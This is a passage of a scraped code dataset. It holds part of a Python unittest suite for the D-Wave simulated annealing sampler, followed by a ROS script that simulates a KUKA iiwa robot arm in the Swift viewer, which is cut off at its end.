self.assertIs(resp.vartype, dimod.BINARY) # should be qubo\n\n    def test_basic_response(self):\n        sampler = SimulatedAnnealingSampler()\n        h = {'a': 0, 'b': -1}\n        J = {('a', 'b'): -1}\n        response = sampler.sample_ising(h, J)\n\n        self.assertIsInstance(response, dimod.SampleSet, \"Sampler returned an unexpected response type\")\n\n    def test_num_reads(self):\n        sampler = SimulatedAnnealingSampler()\n\n        h = {}\n        J = {('a', 'b'): .5, (0, 'a'): -1, (1, 'b'): 0.0}\n\n        for num_reads in (1, 10, 100, 3223, 10352):\n            response = sampler.sample_ising(h, J, num_reads=num_reads)\n            row, col = response.record.sample.shape\n\n            self.assertEqual(row, num_reads)\n            self.assertEqual(col, 4)\n\n        for bad_num_reads in (0, -1, -100):\n            with self.assertRaises(ValueError):\n                sampler.sample_ising(h, J, num_reads=bad_num_reads)\n\n        for bad_num_reads in (3.5, float(\"inf\"), \"string\", [], {}):\n            with self.assertRaises(TypeError):\n                sampler.sample_ising(h, J, num_reads=bad_num_reads)\n\n    def test_empty_problem(self):\n        sampler = SimulatedAnnealingSampler()\n        h = {'a': 0, 'b': -1}\n        J = {('a', 'b'): -1}\n        eh, eJ = {}, {}\n        beta_range = [0.1,1]\n        for h in (h, eh):\n            for J in (J, eJ):\n                _h = copy.deepcopy(h)\n                _J = copy.deepcopy(J)\n                r = sampler.sample_ising(_h, _J, beta_range=beta_range)\n        # An empty problem does not allow for beta_range\n        with warnings.catch_warnings():\n            warnings.simplefilter(\"ignore\")\n            r = sampler.sample_ising(eh, eJ, beta_range=beta_range)\n\n    def test_seed(self):\n        sampler = SimulatedAnnealingSampler()\n        num_vars = 40\n        h = {v: -1 for v in range(num_vars)}\n        J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n        num_reads = 1000\n\n        # test seed exceptions\n        for bad_seed in (3.5, float(\"inf\"), \"string\", [], {}):\n            self.assertRaises(TypeError, sampler.sample_ising, {}, {}, seed=bad_seed)\n        for bad_seed in (-1, -100, 2**65):\n            self.assertRaises(ValueError, sampler.sample_ising, {}, {}, seed=bad_seed)\n\n        # no need to do a bunch of sweeps, in fact the less we do the more\n        # sure we can be that the same seed is returning the same result\n        all_samples = []\n\n        for seed in (1, 25, 2352, 736145, 5682453):\n            response0 = sampler.sample_ising(h, J, num_reads=num_reads, num_sweeps=10, seed=seed)\n            response1 = sampler.sample_ising(h, J, num_reads=num_reads, num_sweeps=10, seed=seed)\n\n            samples0 = response0.record.sample\n            samples1 = response1.record.sample\n\n            self.assertTrue(np.array_equal(samples0, samples1), \"Same seed returned different results\")\n\n            for previous_sample in all_samples:\n                self.assertFalse(np.array_equal(samples0, previous_sample), \"Different seed returned same results\")\n\n            all_samples.append(samples0)\n\n    def test_disconnected_problem(self):\n        sampler = SimulatedAnnealingSampler()\n        h = {}\n        J = {\n            # K_3\n            (0, 1): -1,\n            (1, 2): -1,\n            (0, 2): -1,\n\n            # disconnected K_3\n            (3, 4): -1,\n            (4, 5): -1,\n            (3, 5): -1,\n        }\n\n        resp = sampler.sample_ising(h, J, num_sweeps=1000, num_reads=100)\n\n        row, col = resp.record.sample.shape\n\n        self.assertEqual(row, 100)\n        self.assertEqual(col, 6) # should get back six variables\n        self.assertIs(resp.vartype, dimod.SPIN) # should be ising\n\n\n    def test_interrupt_error(self):\n        sampler = SimulatedAnnealingSampler()\n        num_vars = 40\n        h = {v: -1 for v in range(num_vars)}\n        J = {(u, v): -1 for u in range(num_vars) for v in range(u, num_vars) if u != v}\n        num_reads = 100\n\n        def f():\n            raise NotImplementedError\n\n        resp = sampler.sample_ising(h, J, num_reads=num_reads, interrupt_function=f)\n\n        self.assertEqual(len(resp), 1)\n\n    def 
test_sampleset_initial_states(self):\n bqm = dimod.BinaryQuadraticModel.from_ising({}, {'ab': 1, 'bc': 1, 'ca': 1})\n initial_states = dimod.SampleSet.from_samples_bqm({'a': 1, 'b': -1, 'c': 1}, bqm)\n\n response = SimulatedAnnealingSampler().sample(bqm, initial_states=initial_states, num_reads=1)\n\n self.assertEqual(len(response), 1)\n self.assertEqual(response.first.energy, -1)\n\n def test_initial_states_generator(self):\n bqm = dimod.BinaryQuadraticModel.from_ising({}, {'ab': -1, 'bc': 1, 'ac': 1})\n init = dimod.SampleSet.from_samples_bqm([{'a': 1, 'b': 1, 'c': 1},\n {'a': -1, 'b': -1, 'c': -1}], bqm)\n sampler = SimulatedAnnealingSampler()\n\n # 2 fixed initial state, 8 random\n resp = sampler.sample(bqm, initial_states=init, num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # 2 fixed initial states, 8 random, explicit\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='random', num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # all random\n resp = sampler.sample(bqm, initial_states_generator='random', num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # all random\n resp = sampler.sample(bqm, num_reads=10)\n self.assertEqual(len(resp), 10)\n\n\n # zero-length init states in tuple format, extended by random samples\n zero_init_tuple = (np.empty((0, 3)), ['a', 'b', 'c'])\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n resp = sampler.sample(bqm, initial_states=zero_init_tuple, num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # explicit None for initial_states should use one random init state\n resp = sampler.sample(bqm, initial_states=None)\n self.assertEqual(len(resp), 1)\n\n # initial_states truncated to num_reads?\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='none', num_reads=1)\n self.assertEqual(len(resp), 1)\n\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='tile', num_reads=1)\n self.assertEqual(len(resp), 1)\n\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='random', num_reads=1)\n self.assertEqual(len(resp), 1)\n\n\n # 2 fixed initial states, repeated 5 times\n resp = sampler.sample(bqm, initial_states=init, initial_states_generator='tile', num_reads=10)\n self.assertEqual(len(resp), 10)\n\n # can't tile empty states\n with self.assertRaises(ValueError):\n resp = sampler.sample(bqm, initial_states_generator='tile', num_reads=10)\n\n # not enough initial states\n with self.assertRaises(ValueError):\n resp = sampler.sample(bqm, initial_states_generator='none', num_reads=3)\n\n # initial_states incompatible with the bqm\n init = dimod.SampleSet.from_samples({'a': 1, 'b': 1}, vartype='SPIN', energy=0)\n with self.assertRaises(ValueError):\n resp = sampler.sample(bqm, initial_states=init)\n\n def test_soft_num_reads(self):\n \"\"\"Number of reads adapts to initial_states size, if provided.\"\"\"\n\n bqm = dimod.BinaryQuadraticModel.from_ising({}, {'ab': -1, 'bc': 1, 'ac': 1})\n init = dimod.SampleSet.from_samples_bqm([{'a': 1, 'b': 1, 'c': 1},\n {'a': -1, 'b': -1, 'c': -1}], bqm)\n sampler = SimulatedAnnealingSampler()\n\n # default num_reads == 1\n self.assertEqual(len(sampler.sample(bqm)), 1)\n self.assertEqual(len(sampler.sample(bqm, initial_states_generator=\"random\")), 1)\n\n # with initial_states, num_reads == len(initial_states)\n self.assertEqual(len(sampler.sample(bqm, initial_states=init)), 2)\n\n # ... 
but explicit truncation works too\n self.assertEqual(len(sampler.sample(bqm, initial_states=init, num_reads=1)), 1)\n\n # if num_reads explicitly given together with initial_states, they are expanded\n self.assertEqual(len(sampler.sample(bqm, initial_states=init, num_reads=3)), 3)\n\n # if num_reads explicitly given together without initial_states, they are generated\n self.assertEqual(len(sampler.sample(bqm, num_reads=4)), 4)\n\n def test_0_num_sweeps(self):\n bqm = dimod.BinaryQuadraticModel({}, {'ab': 1}, 0, 'SPIN')\n sampleset = dimod.SampleSet.from_samples_bqm([{'a': 1, 'b': -1},\n {'a': -1, 'b': 1}], bqm)\n\n result = SimulatedAnnealingSampler().sample(bqm, num_sweeps=0, initial_states=sampleset)\n\n self.assertTrue(np.array_equal(result.record.sample, sampleset.record.sample))\n self.assertEqual(len(result.record.sample), 2)\n\n result = SimulatedAnnealingSampler().sample(\n bqm, num_sweeps=0, num_reads=4,\n initial_states=sampleset, initial_states_generator='tile')\n\n expected = np.tile(sampleset.record.sample, (2, 1))\n\n self.assertTrue(np.array_equal(result.record.sample, expected))\n self.assertEqual(len(result), 4)\n\nclass TestDefaultBetaRange(unittest.TestCase):\n def test_empty_problem(self):\n #Values have no impact on behaviour, but should conform to documented structure\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n beta_range = sa.sampler._default_ising_beta_range({}, {})\n self.assertTrue(len(beta_range)==2 and min(beta_range)>= 0)\n\n def test_single_variable_ising_problem(self):\n h1, c1 = sa.sampler._default_ising_beta_range({'a': 0.1}, {})\n h2, c2 = sa.sampler._default_ising_beta_range({'a': 1}, {})\n h3, c3 = sa.sampler._default_ising_beta_range({'a': 10}, {})\n\n self.assertTrue(h1 > h2 > h3)\n self.assertTrue(c1 > c2 > c3)\n self.assertTrue(h1 < c1 and h2 < c2 and h3 < c3)\n\n def test_single_coupling_ising_problem(self):\n h1, c1 = sa.sampler._default_ising_beta_range({}, {'ab': 0.1})\n h2, c2 = sa.sampler._default_ising_beta_range({}, {'ab': 1})\n h3, c3 = sa.sampler._default_ising_beta_range({}, {'ab': 10})\n self.assertTrue(h1 > h2 > h3)\n self.assertTrue(c1 > c2 > c3)\n self.assertTrue(h1 < c1 and h2 < c2 and h3 < c3)\n\n def test_bias_coupling_ranges(self):\n h1, c1 = sa.sampler._default_ising_beta_range({'a': 1}, {'ab': 1})\n h2, c2 = sa.sampler._default_ising_beta_range({'a': 10}, {'ab': 1})\n h3, c3 = sa.sampler._default_ising_beta_range({'a': 10}, {'ab': 10})\n\n self.assertTrue(h1 > h2 > h3)\n self.assertTrue(c1 == c2 > c3)\n self.assertTrue(h1 < c1 and h2 < c2 and h3 < c3)\n\n def test_default_beta_range(self):\n bqm = dimod.BinaryQuadraticModel.from_ising({'a': 1}, {'bc': 1})\n self.assertEqual(sa.sampler.default_beta_range(bqm),\n sa.sampler.default_beta_range(bqm.binary))\n\n def test_scale_T_with_N(self):\n res1 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, scale_T_with_N=False)\n res2 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, scale_T_with_N=True)\n #2 gaps of 2, should indicate lower end temperature:\n\n self.assertTrue(res1[1] > res1[0] and res1[0]>0)\n self.assertTrue(res2[1] > res2[0] and res2[0]>0)\n self.assertTrue(res1[0] == res2[0])\n self.assertTrue(res2[1] > res1[1])\n\n def test_max_single_qubit_excitation_rate(self):\n res1 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, max_single_qubit_excitation_rate=0.01)\n res2 = sa.sampler._default_ising_beta_range({x: 1 for x in range(10)}, {}, max_single_qubit_excitation_rate=0.0001)\n #Lower 
rate should indicate lower end temperature:\n        self.assertTrue(res1[1] > res1[0] and res1[0]>0)\n        self.assertTrue(res2[1] > res2[0] and res2[0]>0)\n        self.assertTrue(res1[0] == res2[0])\n        self.assertTrue(res2[1] > res1[1])\n\nclass TestHeuristicResponse(unittest.TestCase):\n    def test_job_shop_scheduling_with_linear(self):\n        # Set up a job shop scheduling BQM\n        #\n        # Provide a hardcoded version of the bqm of \"jobs\"\n        # jobs = {'b': [(1,1), (3,1)],\n        #         'o': [(2,2), (4,1)],\n        #         'g': [(1,2)]}\n        #\n        # There are three jobs: 'b', 'o', 'g'\n        # Each tuple represents a task that runs on a particular machine for a given amount of\n        # time. I.e. (machine_id, duration_on_machine)\n        #\n        # Variables below are labelled as '<job_name>_<task_index>,<start_time>'.\n        linear = {'b_0,0': -2.0,\n                  'b_0,1': -2.0,\n                  'b_0,2': -2.0,\n                  'b_0,3': -2.0,\n                  'b_1,0': 0.125,\n                  'b_1,1': -1.5,\n                  'b_1,2': 0.0,\n                  'g_0,0': -1.875,\n                  'g_0,1': -1.5,\n                  'g_0,2': 0.0,\n                  'o_0,0': -2.0,\n                  'o_0,1': -2.0,\n                  'o_0,2': -2.0,\n                  'o_1,0': 0.03125,\n                  'o_1,1': -1.875,\n                  'o_1,2': -1.5,\n                  'o_1,3': 0.0}\n\n        quadratic = {('b_0,0', 'g_0,0'): 4,\n                     ('b_0,1', 'b_0,0'): 4.0,\n                     ('b_0,1', 'g_0,0'): 2,\n                     ('b_0,2', 'b_0,0'): 4.0,\n                     ('b_0,2', 'b_0,1'): 4.0,\n                     ('b_0,2', 'b_1,2'): 2,\n                     ('b_0,2', 'g_0,1'): 2,\n                     ('b_0,2', 'g_0,2'): 4,\n                     ('b_0,3', 'b_0,0'): 4.0,\n                     ('b_0,3', 'b_0,1'): 4.0,\n                     ('b_0,3', 'b_0,2'): 4.0,\n                     ('b_0,3', 'b_1,2'): 2,\n                     ('b_0,3', 'g_0,2'): 2,\n                     ('b_1,1', 'b_0,1'): 2,\n                     ('b_1,1', 'b_0,2'): 2,\n                     ('b_1,1', 'b_0,3'): 2,\n                     ('b_1,1', 'b_1,2'): 4.0,\n                     ('g_0,1', 'b_0,1'): 4,\n                     ('g_0,1', 'g_0,0'): 4.0,\n                     ('g_0,2', 'g_0,0'): 4.0,\n                     ('g_0,2', 'g_0,1'): 4.0,\n                     ('o_0,0', 'o_1,1'): 2,\n                     ('o_0,1', 'o_0,0'): 4.0,\n                     ('o_0,1', 'o_1,1'): 2,\n                     ('o_0,1', 'o_1,2'): 2,\n                     ('o_0,2', 'o_0,0'): 4.0,\n                     ('o_0,2', 'o_0,1'): 4.0,\n                     ('o_0,2', 'o_1,1'): 2,\n                     ('o_1,2', 'o_0,2'): 2,\n                     ('o_1,2', 'o_1,1'): 4.0,\n                     ('o_1,3', 'o_0,2'): 2,\n                     ('o_1,3', 'o_1,1'): 4.0,\n                     ('o_1,3', 'o_1,2'): 4.0}\n\n        jss_bqm = dimod.BinaryQuadraticModel(linear, quadratic, 9.0, dimod.BINARY)\n\n        # Optimal energy\n        optimal_solution = {'b_0,0': 1, 'b_0,1': 0, 'b_0,2': 0, 'b_0,3': 0,\n                            'b_1,0': 0, 'b_1,1': 1, 'b_1,2': 0,\n                            'g_0,0': 0, 'g_0,1': 1, 'g_0,2': 0,\n                            'o_0,0': 1, 'o_0,1': 0, 'o_0,2': 0,\n                            'o_1,0': 0, 'o_1,1': 0, 'o_1,2': 1, 'o_1,3': 0}\n        optimal_energy = jss_bqm.energy(optimal_solution)  # Evaluates to 0.5\n\n        # Get heuristic solution\n        sampler = SimulatedAnnealingSampler()\n        response = sampler.sample(jss_bqm, beta_schedule_type=\"linear\", num_reads=10)\n        _, response_energy, _ = next(response.data())\n\n        # Compare energies\n        threshold = 0.1  # Arbitrary threshold\n        self.assertLess(response_energy, optimal_energy + threshold)\n\n    def test_cubic_lattice_with_geometric(self):\n        # Set up all lattice edges in a cube. 
Each edge is labelled by a 3-D coordinate system\n def get_cubic_lattice_edges(N):\n for x, y, z in itertools.product(range(N), repeat=3):\n u = x, y, z\n yield u, ((x+1)%N, y, z)\n yield u, (x, (y+1)%N, z)\n yield u, (x, y, (z+1)%N)\n\n # Add a J-bias to each edge\n np_rand = np.random.RandomState(128)\n J = {e: np_rand.choice((-1, 1)) for e in get_cubic_lattice_edges(12)}\n\n # Solve ising problem\n sampler = SimulatedAnnealingSampler()\n response = sampler.sample_ising({}, J, beta_schedule_type=\"geometric\", num_reads=10)\n _, response_energy, _ = next(response.data())\n\n # Note: lowest energy found was -3088 with a different benchmarking tool\n threshold = -3000\n self.assertLess(response_energy, threshold, (\"response_energy, {}, exceeds \"\n \"threshold\").format(response_energy))\n\nclass TestCoreSpinUpdate(unittest.TestCase):\n sampler = SimulatedAnnealingSampler()\n # Tighter randomized unit tests can fail randomly, using a seed prevents rare (but\n # confusing) false alarms.\n seed = 2023\n \n def make_confidence_interval(self, p, num_samples, k=3):\n # Spins flip with probability p\n # mean number of flips per sweep = num_var*p\n # variance = num_var*p*(1-p)\n # A k sigma interval for number of flips is roughly mean +/- k root(var)\n\n mu = num_samples*p\n sig = np.sqrt(num_samples*p*(1-p))\n upper_bound = mu + k*sig\n lower_bound = mu - k*sig\n \n return lower_bound, upper_bound\n \n def test_Metropolis_ergodicity_breaking(self):\n # Default operation, Metropolis sequential order - deterministic in\n # Null BQM (flat energy landscape) given fixed initial condition.\n num_vars = 100\n # test result is independent of the realization, so no need for seed\n init_vector = 1 - 2*np.random.randint(2, size=num_vars)\n bqm = dimod.BinaryQuadraticModel.from_ising(\n {i : 0 for i in range(num_vars)},{})\n initial_states = dimod.SampleSet.from_samples_bqm(\n {i : init_vector[i] for i in range(num_vars)}, bqm)\n beta_range = [0.1,1] # Bypass ill-conditioned (pathological context) routine.\n # Spins oscillate (ergodicity breaking):\n for num_sweeps in range(3):\n response = SimulatedAnnealingSampler().sample(\n bqm, initial_states=initial_states, num_reads=1,\n num_sweeps=num_sweeps, beta_range=beta_range)\n self.assertTrue(np.all(response.record.sample == (-1)**num_sweeps * init_vector))\n\n def test_central_limits_random_updates(self):\n # Gibbs update, and random ordering, produce probabilistic results\n # We can however be quite confident in central limits. To avoid rare\n # failures, the seed is set. 
If a failure is encountered (because the\n        # pseudo random number generator is changed and we are simply unlucky),\n        # a new seed can be hard coded (and that should with high probability\n        # resolve the problem in the absence of real bugs).\n        num_vars = 10000\n        bqm = dimod.BinaryQuadraticModel.from_ising(\n            {i : 0 for i in range(num_vars)},{})\n        initial_states = dimod.SampleSet.from_samples_bqm(\n            {i : 1 for i in range(num_vars)}, bqm)\n        k = 3 # Significance threshold\n        beta_range = [0.1,1] # Bypass ill-conditioned (pathological context) routine.\n        # Gibbs sequential order sweep (test of central limit):\n        p = 0.5\n        lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n        response = SimulatedAnnealingSampler().sample(\n            bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n            num_sweeps=1, proposal_acceptance_criteria='Gibbs',\n            beta_range=beta_range)\n        stat = np.sum(response.record.sample==1)\n        self.assertLess(stat, upper_bound)\n        self.assertGreater(stat, lower_bound)\n        # Metropolis random order sweep (test of central limit):\n        # A spin will flip on a sweep if selected (with replacement) an odd\n        # number of times. We anticipate roughly Poissonian statistics for\n        # large num_var (large enough here). P(x = num selections) =\n        # exp(-1)/x!, P(selected twice) = (1/2)^2 exp(-1)/2!, etc.\n        # p = P(not flipped) = exp(-1)*[1 + 1/2! + 1/4! ..] = exp(-1)*cosh(1) = 0.568\n        # Roughly a Bernoulli random number, hence:\n        p = np.cosh(1)*np.exp(-1)\n        lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n        # proposal_acceptance_criteria = 'Metropolis' by default:\n        response = SimulatedAnnealingSampler().sample(\n            bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n            num_sweeps=1, randomize_order=True, beta_range=beta_range) \n        stat = np.sum(response.record.sample==1)\n        self.assertLess(stat, upper_bound)\n        self.assertGreater(stat, lower_bound)\n        # Gibbs randomized order: 50:50 on states sampled once.\n        p = 1/np.exp(1) + (1-1/np.exp(1))*0.5\n        lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n        response = SimulatedAnnealingSampler().sample(\n            bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n            num_sweeps=1, randomize_order=True, proposal_acceptance_criteria='Gibbs',\n            beta_range=beta_range)\n        stat = np.sum(response.record.sample==1)\n        self.assertLess(stat, upper_bound)\n        self.assertGreater(stat, lower_bound)\n        # Gibbs with energy signal, regardless of num_sweeps and initial condition expect +1\n        # state with probability exp(-beta_final)/[exp(beta_final) + exp(-beta_final)] on every\n        # updated state (all states given sequential order)\n        bqm = dimod.BinaryQuadraticModel.from_ising(\n            {i : 1 for i in range(num_vars)}, {})\n        betas = [1, 1.5]\n        p = np.exp(-betas[-1])/(2*np.cosh(betas[-1]))\n        lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n        response = SimulatedAnnealingSampler().sample(\n            bqm, initial_states=initial_states, num_reads=1, seed=self.seed,\n            proposal_acceptance_criteria='Gibbs',\n            beta_schedule_type='custom', beta_schedule=betas, num_sweeps_per_beta=1)\n        stat = np.sum(response.record.sample==1)\n        self.assertLess(stat, upper_bound)\n        self.assertGreater(stat, lower_bound)\n    \n    def test_greedy_limit_independent_spins(self):\n        num_vars = 10000\n        # test result is independent of the realization, so no need for seed\n        init_vector = np.random.normal(size=num_vars)\n        bqm = dimod.BinaryQuadraticModel.from_ising(\n            {i : init_vector[i] for i in range(num_vars)},{})\n        beta_schedule_type = 'custom'\n        
beta_schedule = [float('inf')]\n        k = 3 # Significance threshold\n        # Check escape from/to trivial ground state, all methods:\n        ground_state_vec = np.array([-int(np.sign(bqm.linear[i]))\n                                     for i in range(num_vars)])\n        ground_state = dimod.SampleSet.from_samples_bqm(\n            {i : ground_state_vec[i] for i in range(num_vars)}, bqm)\n        sky_state = dimod.SampleSet.from_samples_bqm(\n            {i : -ground_state_vec[i] for i in range(num_vars)}, bqm)\n        # All touched spins escape to the ground state.\n        p = 1 - np.exp(-1) # ~Probability index sampled at least once:\n        lower_bound, upper_bound = self.make_confidence_interval(p, num_vars, k)\n        for randomize_order in [False, True]:\n            for proposal_acceptance_criteria in ['Metropolis', 'Gibbs']:\n                response = SimulatedAnnealingSampler().sample(\n                    bqm, initial_states=ground_state, num_reads=1,\n                    num_sweeps=1, randomize_order=randomize_order,\n                    proposal_acceptance_criteria=proposal_acceptance_criteria,\n                    beta_schedule_type=beta_schedule_type,\n                    beta_schedule=beta_schedule, seed=self.seed)\n                self.assertTrue(np.all(response.record.sample==\n                                       ground_state_vec))\n                response = SimulatedAnnealingSampler().sample(\n                    bqm, initial_states=sky_state, num_reads=1,\n                    num_sweeps=1, randomize_order=randomize_order,\n                    proposal_acceptance_criteria=proposal_acceptance_criteria,\n                    beta_schedule_type=beta_schedule_type,\n                    beta_schedule=beta_schedule, seed=self.seed)\n                if randomize_order == False:\n                    # Recovers ground state\n                    self.assertTrue(np.all(response.record.sample==\n                                           ground_state_vec))\n                else:\n                    # Partial recovery only (in line with sampled indices)\n                    stat = np.sum(response.record.sample==ground_state_vec)\n                    self.assertLess(stat, upper_bound)\n                    self.assertGreater(stat, lower_bound)\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"dwavesystems/dwave-samplers","sub_path":"tests/test_simulated_annealing_sampler.py","file_name":"test_simulated_annealing_sampler.py","file_ext":"py","file_size_in_byte":30261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"16470763686","text":"#!/usr/bin/env python3\n\nimport rospy\nimport roboticstoolbox as rtb\nfrom math import pi\nimport swift\nimport time\nimport numpy as np\nfrom std_msgs.msg import String\n\n\nclass KukaSimulatedROS:\n    def __init__(self) -> None:\n        \n        \n        # Kuka LBR iiwa 14 R820 from robotic toolbox library\n        self.kuka_robot_urdf = rtb.models.URDF.LBR()\n\n        # Make a listener for kuka_iiwa commands\n        rospy.Subscriber(\"kuka_command\", String, self.command_callback)\n\n        # Make Publishers for all kuka_iiwa data\n        self.pub_JointPosition = rospy.Publisher('JointPosition', String, queue_size=10)\n        self.pub_ToolPosition = rospy.Publisher('ToolPosition', String, queue_size=10)\n        self.pub_ToolForce = rospy.Publisher('ToolForce', String, queue_size=10)\n        self.pub_ToolTorque = rospy.Publisher('ToolTorque', String, queue_size=10)\n        self.pub_isCompliance = rospy.Publisher('isCompliance', String, queue_size=10)\n        self.pub_isCollision = rospy.Publisher('isCollision', String, queue_size=10)\n        self.pub_isReadyToMove = rospy.Publisher('isReadyToMove', String, queue_size=10)\n        self.pub_isMastered = rospy.Publisher('isMastered', String, queue_size=10)\n        self.pub_OperationMode = rospy.Publisher('OperationMode', String, queue_size=10)\n        self.pub_JointAcceleration = rospy.Publisher('JointAcceleration', String, queue_size=10)\n        self.pub_JointVelocity = rospy.Publisher('JointVelocity', String, queue_size=10)\n        self.pub_JointJerk = rospy.Publisher('JointJerk', String, queue_size=10)\n        
self.pub_isFinished = rospy.Publisher('isFinished', String, queue_size=10)\n        self.pub_hasError = rospy.Publisher('hasError', String, queue_size=10)\n        self.pub_OperatorAck = rospy.Publisher('OperatorAck', String, queue_size=10)\n\n        # Make kuka_iiwa node\n        rospy.init_node('iiwa_simulation', disable_signals=True)\n        rospy.loginfo(\"iiwa_simulation node started\")\n        rate = rospy.Rate(100) # 100hz update rate.\n\n        # Kuka state\n        self.JointPosition = [0,0,0,0,0,0,0]\n        self.ToolPosition = [0,0,0,0,0,0]\n        self.ToolForce = [0,0,0]\n        self.ToolTorque = [0,0,0]\n        self.isCompliance = False\n        self.isCollision = False\n        self.isReadyToMove = True\n        self.isMastered = True\n        self.OperationMode = 0\n        self.JointAcceleration = [0,0,0,0,0,0,0]\n        self.JointVelocity = [0,0,0,0,0,0,0]\n        self.JointJerk = [0,0,0,0,0,0,0]\n        self.isFinished = True\n        self.hasError = False\n        self.OperatorAck = False\n\n        # Desired state\n        self.DesPosition = [0,0,0,0,0,0,0]\n        self.move_flag = False\n\n        # start a rostimer to publish states\n        publish_fps = 100\n        rospy.Timer(rospy.Duration(1/publish_fps), self.publish_states)\n\n    def command_callback(self, msg):\n        rospy.loginfo(\"Command received: %s\", msg.data)\n        \n        # handle if command is SetPosition\n        data = msg.data\n        command = data.split(' ')[0]\n        args = data.split(' ')[1:]\n        if command == \"setPosition\":\n            if len(args) != 7:\n                rospy.logerr(\"setPosition command requires 7 arguments\")\n                return\n            \n            # get desired joint position\n            for i in range(7):\n                self.DesPosition[i] = args[i]\n\n            # set move flag\n            self.move_flag = True\n        \n        # TODO: implement other commands\n        \n        return\n\n    def list_to_string(self, values):\n        return ' '.join(map(str, values))\n\n    def publish_states(self, event):\n\n        # update joint position in degrees\n        self.JointPosition = [round(qi * 180 / pi, 3) for qi in self.kuka_robot_urdf.q]\n\n        # update tool position (compute forward kinematics once)\n        tool_pose = self.kuka_robot_urdf.fkine(self.kuka_robot_urdf.q)\n        self.tool_position_t = tool_pose.t\n        self.tool_position_r = tool_pose.rpy(order='zyx')\n\n        self.tool_position_t = np.around(self.tool_position_t, decimals=3)\n        self.tool_position_r = np.around(self.tool_position_r, decimals=3)\n\n        # update joint velocity\n        # TODO\n\n        # update joint acceleration\n        # TODO\n\n        # publish robot joint states\n        self.pub_JointPosition.publish(self.list_to_string(self.JointPosition))\n        self.pub_ToolPosition.publish(self.list_to_string(np.hstack((self.tool_position_t, self.tool_position_r))))\n        # self.pub_ToolForce.publish(self.list_to_string(self.ToolForce))\n        # self.pub_ToolTorque.publish(self.list_to_string(self.ToolTorque))\n        # self.pub_JointAcceleration.publish(self.list_to_string(self.JointAcceleration))\n        # self.pub_JointVelocity.publish(self.list_to_string(self.JointVelocity))\n        # self.pub_JointJerk.publish(self.list_to_string(self.JointJerk))\n\n        # publish robot boolean states\n        self.pub_isCompliance.publish(str(self.isCompliance))\n        self.pub_isCollision.publish(str(self.isCollision))\n        self.pub_isReadyToMove.publish(str(self.isReadyToMove))\n        self.pub_isMastered.publish(str(self.isMastered))\n        self.pub_OperationMode.publish(str(self.OperationMode))\n        self.pub_isFinished.publish(str(self.isFinished))\n        self.pub_hasError.publish(str(self.hasError))\n        self.pub_OperatorAck.publish(str(self.OperatorAck))\n        return\n\n# Simulate ros topics\nkuka_ros = KukaSimulatedROS()\n\n# Launch the simulator Swift\nenv = swift.Swift()\nenv.launch(browser='firefox') \n\n# Add the robot to the simulator\nenv.add(kuka_ros.kuka_robot_urdf)\n\n# This is our callback function 
from the sliders in Swift which set\n# the joint angles of our robot to the value of the sliders\ndef set_joint(j, value):\n    # print(f\"aaaa{j}\")\n    kuka_ros.kuka_robot_urdf.q[j] = np.deg2rad(float(value))\n\ndef add_slider():\n    # Loop through each link in the Kuka and if it is a variable joint,\n    # add a slider to Swift to control it\n    j = 0\n    for link in kuka_ros.kuka_robot_urdf.links:\n        if link.isjoint:\n\n            # We use a lambda as the callback function from Swift\n            # j=j is used to set the value of j rather than the variable j\n            # We use the HTML unicode format for the degree sign in the unit arg\n            env.add(\n                swift.Slider(\n                    lambda x, j=j: set_joint(j, x),\n                    min=np.round(np.rad2deg(link.qlim[0]), 2),\n                    max=np.round(np.rad2deg(link.qlim[1]), 2),\n                    step=1,\n                    value=np.round(np.rad2deg(kuka_ros.kuka_robot_urdf.q[j]), 2),\n                    desc=\"Joint \" + str(j),\n                    unit=\"°\",\n                )\n            )\n            j += 1\n\n# move robot to the desired joint position with joint motion planning\n# w in degrees/s\ndef move(des_position, w = 20):\n    # trajectory steps and time to move\n    steps = 500\n    t_move = np.linalg.norm(np.deg2rad(np.array(des_position, dtype=np.float32)) - kuka_ros.kuka_robot_urdf.q)/np.deg2rad(w)\n    dt = t_move/(steps)\n\n    # joint motion planning\n    q_traj = rtb.jtraj(kuka_ros.kuka_robot_urdf.q, np.deg2rad(np.array(des_position, dtype=np.float32)), steps)\n\n    # move the simulated robot\n    for q in q_traj.q:\n        kuka_ros.kuka_robot_urdf.q = q\n        env.step(0)\n        time.sleep(dt) \n\n# Add the sliders to Swift\nadd_slider()\n\nq = np.array([0,0,0,0,0,0,0])\nwhile True:\n    # Process the event queue from Swift, this invokes the callback functions\n    # from the sliders if the slider value was changed\n    # env.process_events()\n    \n    if kuka_ros.move_flag:\n        # update flags for busy state\n        # kuka_ros.isReadyToMove = False\n        kuka_ros.isFinished = False\n\n        # move robot on simulation\n        move(kuka_ros.DesPosition)\n        # move([100,50,50,20,4,56,0])\n\n        # update flags for ready state\n        kuka_ros.move_flag = False\n        # kuka_ros.isReadyToMove = True\n        kuka_ros.isFinished = True\n\n    # Update the environment with the new robot pose\n    env.step(0.05)\n\n    # 